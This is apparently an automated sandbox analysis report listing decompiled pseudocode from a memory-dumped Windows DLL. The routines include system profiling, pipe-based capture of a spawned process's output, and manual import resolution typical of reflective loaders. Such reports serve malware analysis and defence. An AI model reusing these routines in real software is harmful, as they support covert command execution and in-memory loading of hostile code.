    • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
    • String ID:
    • API String ID: 1610782348-0
    • Opcode ID: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
    • Instruction ID: f9fb2e14203abb558b51dae657c8012b2cf373e276ee73c0d93c46e05e0496eb
    • Opcode Fuzzy Hash: f30b641bcf0aa0fe1c904c3557c566646e3f16f6a2450ffed76bd1eba4bc5383
    • Instruction Fuzzy Hash: A821E471600255BBEB249B62CC4DE6FBFBCEFC6B55F11415DB906AA290CA70DA41CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E1001220A(char* __eax, char** _a4, long long* _a8) {
    				char* _v8;
    				long long _v16;
    				char* _t9;
    				signed char _t11;
    				char** _t19;
    				char _t22;
    				long long _t32;
    				long long _t33;
    
    				_t9 = __eax;
    				L100122D8();
    				_t19 = _a4;
    				_t22 =  *__eax;
    				if( *_t22 != 0x2e) {
    					_t9 = strchr( *_t19, 0x2e);
    					if(_t9 != 0) {
    						 *_t9 =  *_t22;
    					}
    				}
    				L1001229C();
    				 *_t9 =  *_t9 & 0x00000000;
    				_t11 = strtod( *_t19,  &_v8);
    				asm("fst qword [ebp-0xc]");
    				_t32 =  *0x10018248;
    				asm("fucomp st1");
    				asm("fnstsw ax");
    				if((_t11 & 0x00000044) != 0) {
    					L5:
    					st0 = _t32;
    					L1001229C();
    					if( *_t11 != 0x22) {
    						_t33 = _v16;
    						goto L8;
    					} else {
    						return _t11 | 0xffffffff;
    					}
    				} else {
    					_t33 =  *0x10018250;
    					asm("fucomp st1");
    					asm("fnstsw ax");
    					if((_t11 & 0x00000044) != 0) {
    						L8:
    						 *_a8 = _t33;
    						return 0;
    					} else {
    						goto L5;
    					}
    				}
    			}












    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: _errno$localeconvstrchrstrtod
    • String ID:
    • API String ID: 1035490122-0
    • Opcode ID: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
    • Instruction ID: bc1e6689561b9e656043b1385d2f50dc6362d0c3bb2d0ffc00f4b959df95ecfa
    • Opcode Fuzzy Hash: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
    • Instruction Fuzzy Hash: 4801D8B9900145BADB12DF64D90169D7BA4EF4B364F2141D0E9806F1E1CB74D5F5C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E1000CF8F(void* __ecx) {
    				intOrPtr _t11;
    				long _t12;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				struct _OSVERSIONINFOA* _t29;
    
    				_push(__ecx);
    				_t29 =  *0x1001e688; // 0x87804a0
    				GetCurrentProcess();
    				_t11 = E1000B9EB();
    				_t1 = _t29 + 0x1644; // 0x8781ae4
    				_t25 = _t1;
    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
    				_t33 = _t12;
    				if(_t12 != 0) {
    					_t12 = E10008FA4(_t25, _t33);
    				}
    				_t3 = _t29 + 0x228; // 0x87806c8
    				 *(_t29 + 0x1854) = _t12;
    				 *((intOrPtr*)(_t29 + 0x434)) = E10008FA4(_t3, _t33);
    				memset(_t29, 0, 0x9c);
    				_t29->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t29);
    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
    				_t17 = E1000E3C1(_t3);
    				_t7 = _t29 + 0x220; // 0x87806c0
    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
    				_t18 = E1000E3FC(_t7);
    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
    				return _t18;
    			}









    APIs
    • GetCurrentProcess.KERNEL32(?,?,087804A0,?,1000353A), ref: 1000CF9B
    • GetModuleFileNameW.KERNEL32(00000000,08781AE4,00000105,?,?,087804A0,?,1000353A), ref: 1000CFBC
    • memset.MSVCRT ref: 1000CFED
    • GetVersionExA.KERNEL32(087804A0,087804A0,?,1000353A), ref: 1000CFF8
    • GetCurrentProcessId.KERNEL32(?,1000353A), ref: 1000CFFE
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentProcess$FileModuleNameVersionmemset
    • String ID:
    • API String ID: 3581039275-0
    • Opcode ID: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
    • Instruction ID: b585eaf47835b1e69fe94979de649fd9c2e4cab01659644ccb5f3879e9bd62b3
    • Opcode Fuzzy Hash: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
    • Instruction Fuzzy Hash: DC019E749017149BE760DF308C8ABEABBE5EF94350F00082DF59693251EB70B705CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E1000A99D(signed int __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				struct _SECURITY_ATTRIBUTES _v48;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				void* _v84;
    				short _v92;
    				intOrPtr _v96;
    				void _v140;
    				intOrPtr _t77;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				long _t111;
    				intOrPtr _t115;
    				intOrPtr _t126;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t111 = 0;
    				_v24 = __ecx;
    				_v12 = 0;
    				_v20 = 0;
    				_t127 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v48.nLength = 0xc;
    				_v48.lpSecurityDescriptor = 0;
    				_v48.bInheritHandle = 1;
    				_v28 = 0;
    				memset( &_v140, 0, 0x44);
    				asm("stosd");
    				_t130 = _t129 + 0xc;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
    					L18:
    					return 0;
    				}
    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
    					L13:
    					E10008600( &_v28, 0);
    					if(_v20 != 0) {
    						_t77 =  *0x1001e684; // 0x87ff878
    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
    					}
    					if(_v8 != 0) {
    						_t115 =  *0x1001e684; // 0x87ff878
    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
    					}
    					return _t111;
    				}
    				_t79 = _v16;
    				_v76 = _t79;
    				_v80 = _t79;
    				_v84 = _v12;
    				_v140 = 0x44;
    				_v96 = 0x101;
    				_v92 = 0;
    				_t126 = E100085EA(0x1001);
    				_v28 = _t126;
    				if(_t126 == 0) {
    					goto L18;
    				}
    				_push( &_v64);
    				_push( &_v140);
    				_t85 =  *0x1001e684; // 0x87ff878
    				_push(0);
    				_push(0);
    				_push(0x8000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push(_v24);
    				_push(0);
    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
    					goto L13;
    				}
    				_t87 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
    				_t89 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
    				_v24 = _v24 & 0;
    				do {
    					_t92 =  *0x1001e684; // 0x87ff878
    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
    					 *((char*)(_v24 + _t126)) = 0;
    					if(_t111 == 0) {
    						_t127 = E1000918C(_t126, 0);
    					} else {
    						_push(0);
    						_push(_t126);
    						_v32 = _t127;
    						_t127 = E10009278(_t127);
    						E10008600( &_v32, 0xffffffff);
    						_t130 = _t130 + 0x14;
    					}
    					_t111 = _t127;
    					_v32 = _t127;
    				} while (_v36 != 0);
    				_push( &_v36);
    				_push(E1000C384(_t127));
    				_t98 =  *0x1001e68c; // 0x87ffa40
    				_push(_t127);
    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
    					L12:
    					_t100 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
    					_t102 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
    					goto L13;
    				}
    				_t128 = E1000923C(_t127);
    				if(_t128 == 0) {
    					goto L12;
    				}
    				E10008600( &_v32, 0);
    				return _t128;
    			}





































    APIs
    • memset.MSVCRT ref: 1000A9DA
    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000A9FE
    • CreatePipe.KERNEL32(1000658F,?,0000000C,00000000), ref: 1000AA15
      • Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateHeapPipe$AllocateFreememset
    • String ID: D
    • API String ID: 2365139273-2746444292
    • Opcode ID: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
    • Instruction ID: 746ba47fdd6cc5b050f282edc2f958d2642d0c94e781aeb0ddd390b9b3935c5a
    • Opcode Fuzzy Hash: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
    • Instruction Fuzzy Hash: 59511672900219AFEB41CFA8CC85FDEBBB9FB08380F514169F500E7255DB74AA458B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E100124A6(signed int __eax, intOrPtr _a4) {
    				intOrPtr* _v8;
    				signed int* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				struct HINSTANCE__* _v48;
    				intOrPtr _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				signed int _v64;
    				signed int _t109;
    				signed int _t112;
    				signed int _t115;
    				void* _t163;
    
    				_v44 = _v44 & 0x00000000;
    				if(_a4 != 0) {
    					_v48 = GetModuleHandleA("kernel32.dll");
    					_v40 = E1000E0A4(_v48, "GetProcAddress");
    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    					_v32 = _v52;
    					_t109 = 8;
    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
    						L24:
    						return 0;
    					}
    					_v56 = 0x80000000;
    					_t112 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v8 = _v8 + 0x14;
    					}
    					_t115 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
    						if(_v36 != 0) {
    							if( *_v8 == 0) {
    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
    							} else {
    								_v12 =  *_v8 + _a4;
    							}
    							_v28 = _v28 & 0x00000000;
    							while( *_v12 != 0) {
    								_v24 = _v24 & 0x00000000;
    								_v16 = _v16 & 0x00000000;
    								_v64 = _v64 & 0x00000000;
    								_v20 = _v20 & 0x00000000;
    								if(( *_v12 & _v56) == 0) {
    									_v60 =  *_v12 + _a4;
    									_v20 = _v60 + 2;
    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
    									_v16 = _v40(_v36, _v20);
    								} else {
    									_v24 =  *_v12;
    									_v20 = _v24 & 0x0000ffff;
    									_v16 = _v40(_v36, _v20);
    								}
    								if(_v24 != _v16) {
    									_v44 = _v44 + 1;
    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
    										 *_v12 = _v16;
    									} else {
    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
    									}
    								}
    								_v12 =  &(_v12[1]);
    								_v28 = _v28 + 4;
    							}
    							_v8 = _v8 + 0x14;
    							continue;
    						}
    						_t163 = 0xfffffffd;
    						return _t163;
    					}
    					goto L24;
    				}
    				return __eax | 0xffffffff;
    			}























    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124C3
    • LoadLibraryA.KERNEL32(00000000), ref: 1001255C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID: GetProcAddress$kernel32.dll
    • API String ID: 4133054770-1584408056
    • Opcode ID: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
    • Instruction ID: 07b277518937ab197daabd61ad14ff0b0aa7506dcab8f797d25a3703402acd83
    • Opcode Fuzzy Hash: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
    • Instruction Fuzzy Hash: 73617CB5D00209EFDB40CF98C985BADBBF1FF08355F208599E815AB2A1D374AA90DF54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E1000C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				void _v140;
    				signed char _t14;
    				char _t15;
    				intOrPtr _t20;
    				void* _t25;
    				intOrPtr _t26;
    				intOrPtr _t32;
    				WCHAR* _t34;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t37;
    				int _t38;
    				intOrPtr _t46;
    				void* _t47;
    				intOrPtr _t50;
    				void* _t60;
    				void* _t61;
    				char _t62;
    				char* _t63;
    				void* _t65;
    				intOrPtr _t66;
    				char _t68;
    
    				_t65 = __esi;
    				_t61 = __edi;
    				_t47 = __ebx;
    				_t50 =  *0x1001e688; // 0x87804a0
    				_t14 =  *(_t50 + 0x1898);
    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
    					_t15 = E100095C7(_t50, 0xb62);
    					_t66 =  *0x1001e688; // 0x87804a0
    					_t62 = _t15;
    					_t67 = _t66 + 0xb0;
    					_v8 = _t62;
    					E10009626( &_v140, 0x40, L"%08x", E1000D40B(_t66 + 0xb0, E1000C384(_t66 + 0xb0), 0));
    					_t20 =  *0x1001e688; // 0x87804a0
    					asm("sbb eax, eax");
    					_t25 = E100095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
    					_t63 = "\\";
    					_t26 =  *0x1001e688; // 0x87804a0
    					_t68 = E100092CB(_t26 + 0x1020);
    					_v12 = _t68;
    					E100085BB( &_v8);
    					_t32 =  *0x1001e688; // 0x87804a0
    					_t34 = E100092CB(_t32 + 0x122a);
    					 *0x1001e784 = _t34;
    					_t35 =  *0x1001e684; // 0x87ff878
    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
    					_t37 = LoadLibraryW( *0x1001e784);
    					 *0x1001e77c = _t37;
    					if(_t37 == 0) {
    						_t38 = 0;
    					} else {
    						_push(_t37);
    						_t60 = 0x28;
    						_t38 = E1000E17C(0x1001bb40, _t60);
    					}
    					 *0x1001e780 = _t38;
    					E10008600( &_v12, 0xfffffffe);
    					memset( &_v140, 0, 0x80);
    					if( *0x1001e780 != 0) {
    						goto L10;
    					} else {
    						E10008600(0x1001e784, 0xfffffffe);
    						goto L8;
    					}
    				} else {
    					L8:
    					if( *0x1001e780 == 0) {
    						_t46 =  *0x1001e6bc; // 0x87ff9a0
    						 *0x1001e780 = _t46;
    					}
    					L10:
    					return 1;
    				}
    			}



























    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: LibraryLoadmemset
    • String ID: %08x$dll
    • API String ID: 3406617148-2963171978
    • Opcode ID: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
    • Instruction ID: 286451e2d6f5d77c3e96009a634a1e8f77bc4d61d346aa34e357d183eb196ad5
    • Opcode Fuzzy Hash: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
    • Instruction Fuzzy Hash: 9231E1B2904658AFF700CB68DC89F9E73ECEB58394F508129F105E7195EB34EE848B24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E10012D80(int _a4, signed int _a8) {
    				int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t137;
    				signed int _t141;
    				intOrPtr* _t142;
    				signed int _t145;
    				signed int _t146;
    				intOrPtr _t151;
    				intOrPtr _t161;
    				intOrPtr _t162;
    				intOrPtr _t167;
    				intOrPtr _t170;
    				signed int _t172;
    				intOrPtr _t173;
    				int _t184;
    				intOrPtr _t185;
    				intOrPtr _t188;
    				signed int _t189;
    				void* _t195;
    				int _t202;
    				int _t208;
    				intOrPtr _t217;
    				signed int _t218;
    				int _t219;
    				intOrPtr _t220;
    				signed int _t221;
    				signed int _t222;
    				int _t224;
    				int _t225;
    				signed int _t227;
    				intOrPtr _t228;
    				int _t232;
    				int _t234;
    				signed int _t235;
    				int _t239;
    				void* _t240;
    				int _t245;
    				int _t252;
    				signed int _t253;
    				int _t254;
    				void* _t257;
    				void* _t258;
    				int _t259;
    				intOrPtr _t260;
    				int _t261;
    				signed int _t269;
    				signed int _t271;
    				intOrPtr* _t272;
    				void* _t273;
    
    				_t253 = _a8;
    				_t272 = _a4;
    				_t3 = _t272 + 0xc; // 0x452bf84d
    				_t4 = _t272 + 0x2c; // 0x8df075ff
    				_t228 =  *_t4;
    				_t137 =  *_t3 + 0xfffffffb;
    				_t229 =  <=  ? _t137 : _t228;
    				_v16 =  <=  ? _t137 : _t228;
    				_t269 = 0;
    				_a4 =  *((intOrPtr*)( *_t272 + 4));
    				asm("o16 nop [eax+eax]");
    				while(1) {
    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
    					_t141 =  *_t8 + 0x2a >> 3;
    					_v12 = 0xffff;
    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
    					if(_t217 < _t141) {
    						break;
    					}
    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
    					_t12 = _t272 + 0x5c; // 0x5fe85000
    					_t245 =  *_t11 -  *_t12;
    					_v8 = _t245;
    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
    					_t247 =  <  ? _t195 : _v12;
    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
    					if(_t227 >= _v16) {
    						L7:
    						if(_t253 != 4) {
    							L10:
    							_t269 = 0;
    							__eflags = 0;
    						} else {
    							_t285 = _t227 - _t195;
    							if(_t227 != _t195) {
    								goto L10;
    							} else {
    								_t269 = _t253 - 3;
    							}
    						}
    						E10015DA0(_t272, _t272, 0, 0, _t269);
    						_t18 = _t272 + 0x14; // 0xc703f045
    						_t19 = _t272 + 8; // 0x8d000040
    						 *( *_t18 +  *_t19 - 4) = _t227;
    						_t22 = _t272 + 0x14; // 0xc703f045
    						_t23 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
    						_t26 = _t272 + 0x14; // 0xc703f045
    						_t27 = _t272 + 8; // 0x8d000040
    						 *( *_t26 +  *_t27 - 2) =  !_t227;
    						_t30 = _t272 + 0x14; // 0xc703f045
    						_t31 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
    						E10014B00(_t285,  *_t272);
    						_t202 = _v8;
    						_t273 = _t273 + 0x14;
    						if(_t202 != 0) {
    							_t208 =  >  ? _t227 : _t202;
    							_v8 = _t208;
    							_t36 = _t272 + 0x38; // 0xf47d8bff
    							_t37 = _t272 + 0x5c; // 0x5fe85000
    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
    							_t273 = _t273 + 0xc;
    							_t252 = _v8;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
    							_t227 = _t227 - _t252;
    						}
    						if(_t227 != 0) {
    							E10014C40( *_t272,  *( *_t272 + 0xc), _t227);
    							_t273 = _t273 + 0xc;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
    						}
    						_t253 = _a8;
    						if(_t269 == 0) {
    							continue;
    						}
    					} else {
    						if(_t227 != 0 || _t253 == 4) {
    							if(_t253 != 0 && _t227 == _t195) {
    								goto L7;
    							}
    						}
    					}
    					break;
    				}
    				_t142 =  *_t272;
    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
    				_a4 = _t232;
    				if(_t232 == 0) {
    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
    					_t254 =  *_t83;
    				} else {
    					_t59 = _t272 + 0x2c; // 0x8df075ff
    					_t224 =  *_t59;
    					if(_t232 < _t224) {
    						_t65 = _t272 + 0x3c; // 0x830cc483
    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
    						_t260 =  *_t66;
    						__eflags =  *_t65 - _t260 - _t232;
    						if( *_t65 - _t260 <= _t232) {
    							_t67 = _t272 + 0x38; // 0xf47d8bff
    							_t261 = _t260 - _t224;
    							 *(_t272 + 0x6c) = _t261;
    							memcpy( *_t67,  *_t67 + _t224, _t261);
    							_t70 = _t272 + 0x16b0; // 0xdf750008
    							_t188 =  *_t70;
    							_t273 = _t273 + 0xc;
    							_t232 = _a4;
    							__eflags = _t188 - 2;
    							if(_t188 < 2) {
    								_t189 = _t188 + 1;
    								__eflags = _t189;
    								 *(_t272 + 0x16b0) = _t189;
    							}
    						}
    						_t73 = _t272 + 0x38; // 0xf47d8bff
    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
    						_t225 = _a4;
    						_t273 = _t273 + 0xc;
    						_t76 = _t272 + 0x6c;
    						 *_t76 =  *(_t272 + 0x6c) + _t225;
    						__eflags =  *_t76;
    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
    						_t184 =  *_t78;
    						_t79 = _t272 + 0x2c; // 0x8df075ff
    						_t239 =  *_t79;
    					} else {
    						 *(_t272 + 0x16b0) = 2;
    						_t61 = _t272 + 0x38; // 0xf47d8bff
    						memcpy( *_t61,  *_t142 - _t224, _t224);
    						_t62 = _t272 + 0x2c; // 0x8df075ff
    						_t184 =  *_t62;
    						_t273 = _t273 + 0xc;
    						_t225 = _a4;
    						_t239 = _t184;
    						 *(_t272 + 0x6c) = _t184;
    					}
    					_t254 = _t184;
    					 *(_t272 + 0x5c) = _t184;
    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
    					_t185 =  *_t81;
    					_t240 = _t239 - _t185;
    					_t241 =  <=  ? _t225 : _t240;
    					_t242 = ( <=  ? _t225 : _t240) + _t185;
    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
    				}
    				if( *(_t272 + 0x16c0) < _t254) {
    					 *(_t272 + 0x16c0) = _t254;
    				}
    				if(_t269 == 0) {
    					_t218 = _a8;
    					__eflags = _t218;
    					if(_t218 == 0) {
    						L34:
    						_t89 = _t272 + 0x3c; // 0x830cc483
    						_t219 =  *_t272;
    						_t145 =  *_t89 - _t254 - 1;
    						_a4 =  *_t272;
    						_t234 = _t254;
    						_v16 = _t145;
    						_v8 = _t254;
    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
    							_v8 = _t254;
    							_t95 = _t272 + 0x5c; // 0x5fe85000
    							_a4 = _t219;
    							_t234 = _t254;
    							_t97 = _t272 + 0x2c; // 0x8df075ff
    							__eflags =  *_t95 -  *_t97;
    							if( *_t95 >=  *_t97) {
    								_t98 = _t272 + 0x2c; // 0x8df075ff
    								_t167 =  *_t98;
    								_t259 = _t254 - _t167;
    								_t99 = _t272 + 0x38; // 0xf47d8bff
    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
    								 *(_t272 + 0x6c) = _t259;
    								memcpy( *_t99, _t167 +  *_t99, _t259);
    								_t103 = _t272 + 0x16b0; // 0xdf750008
    								_t170 =  *_t103;
    								_t273 = _t273 + 0xc;
    								__eflags = _t170 - 2;
    								if(_t170 < 2) {
    									_t172 = _t170 + 1;
    									__eflags = _t172;
    									 *(_t272 + 0x16b0) = _t172;
    								}
    								_t106 = _t272 + 0x2c; // 0x8df075ff
    								_t145 = _v16 +  *_t106;
    								__eflags = _t145;
    								_a4 =  *_t272;
    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
    								_t234 =  *_t108;
    								_v8 = _t234;
    							}
    						}
    						_t255 = _a4;
    						_t220 =  *((intOrPtr*)(_a4 + 4));
    						__eflags = _t145 - _t220;
    						_t221 =  <=  ? _t145 : _t220;
    						_t146 = _t221;
    						_a4 = _t221;
    						_t222 = _a8;
    						__eflags = _t146;
    						if(_t146 != 0) {
    							_t114 = _t272 + 0x38; // 0xf47d8bff
    							E10014C40(_t255,  *_t114 + _v8, _t146);
    							_t273 = _t273 + 0xc;
    							_t117 = _t272 + 0x6c;
    							 *_t117 =  *(_t272 + 0x6c) + _a4;
    							__eflags =  *_t117;
    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
    							_t234 =  *_t119;
    						}
    						__eflags =  *(_t272 + 0x16c0) - _t234;
    						if( *(_t272 + 0x16c0) < _t234) {
    							 *(_t272 + 0x16c0) = _t234;
    						}
    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
    						_t123 = _t272 + 0xc; // 0x452bf84d
    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
    						__eflags = _t257 - 0xffff;
    						_t258 =  >  ? 0xffff : _t257;
    						_t124 = _t272 + 0x2c; // 0x8df075ff
    						_t151 =  *_t124;
    						_t125 = _t272 + 0x5c; // 0x5fe85000
    						_t235 = _t234 -  *_t125;
    						__eflags = _t258 - _t151;
    						_t152 =  <=  ? _t258 : _t151;
    						__eflags = _t235 - ( <=  ? _t258 : _t151);
    						if(_t235 >= ( <=  ? _t258 : _t151)) {
    							L49:
    							__eflags = _t235 - _t258;
    							_t154 =  >  ? _t258 : _t235;
    							_a4 =  >  ? _t258 : _t235;
    							__eflags = _t222 - 4;
    							if(_t222 != 4) {
    								L53:
    								_t269 = 0;
    								__eflags = 0;
    							} else {
    								_t161 =  *_t272;
    								__eflags =  *(_t161 + 4);
    								_t154 = _a4;
    								if( *(_t161 + 4) != 0) {
    									goto L53;
    								} else {
    									__eflags = _t154 - _t235;
    									if(_t154 != _t235) {
    										goto L53;
    									} else {
    										_t269 = _t222 - 3;
    									}
    								}
    							}
    							_t131 = _t272 + 0x38; // 0xf47d8bff
    							_t132 = _t272 + 0x5c; // 0x5fe85000
    							E10015DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
    							_t134 = _t272 + 0x5c;
    							 *_t134 =  *(_t272 + 0x5c) + _a4;
    							__eflags =  *_t134;
    							E10014B00( *_t134,  *_t272);
    						} else {
    							__eflags = _t235;
    							if(_t235 != 0) {
    								L46:
    								__eflags = _t222;
    								if(_t222 != 0) {
    									_t162 =  *_t272;
    									__eflags =  *(_t162 + 4);
    									if( *(_t162 + 4) == 0) {
    										__eflags = _t235 - _t258;
    										if(_t235 <= _t258) {
    											goto L49;
    										}
    									}
    								}
    							} else {
    								__eflags = _t222 - 4;
    								if(_t222 == 4) {
    									goto L46;
    								}
    							}
    						}
    						asm("sbb edi, edi");
    						_t271 =  ~_t269 & 0x00000002;
    						__eflags = _t271;
    						return _t271;
    					} else {
    						__eflags = _t218 - 4;
    						if(_t218 == 4) {
    							goto L34;
    						} else {
    							_t173 =  *_t272;
    							__eflags =  *(_t173 + 4);
    							if( *(_t173 + 4) != 0) {
    								goto L34;
    							} else {
    								_t88 = _t272 + 0x5c; // 0x5fe85000
    								__eflags = _t254 -  *_t88;
    								if(_t254 !=  *_t88) {
    									goto L34;
    								} else {
    									return 1;
    								}
    							}
    						}
    					}
    				} else {
    					return 3;
    				}
    			}

    APIs
    Memory Dump Source
